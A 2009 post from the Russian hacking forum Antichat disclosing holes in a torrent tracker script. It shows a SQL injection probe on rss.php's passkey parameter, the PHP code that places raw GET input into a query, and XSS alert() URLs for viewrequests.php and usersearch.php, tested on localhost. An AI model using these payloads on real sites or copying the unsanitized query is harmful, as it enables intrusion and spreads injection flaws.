08.07.2009, 21:07
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
http://127.0.0.1/treker/rss.php?passkey=1'
SQL
Код:
$passkey = $_GET["passkey"];
if ($passkey) {
$user = mysql_fetch_row(sql_query("SELECT COUNT(*) FROM users WHERE passkey = '$passkey'"));
if ($user[0] != 1)
exit();
} else
loggedinorreturn();
XSS
http://127.0.0.1/treker/viewrequests.php?sort=%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
P.S. сорр не бегал по всем страницам так что не знаю выкладывали или нет багу =)
http://127.0.0.1/treker/usersearch.php?r=%22%3Cscript%3Ealert(/XSS/)%3C/script%3E
=\ что то не понял...есть тут что нить или просто косяк кода?
во всех(или нет, не проверял) usersearch.php?....=%22%3Cscript%3Ealert(/XSS/)%3C/script%3E
такой косяк))))
Последний раз редактировалось HAXTA4OK; 08.07.2009 в 21:44..
|
|
|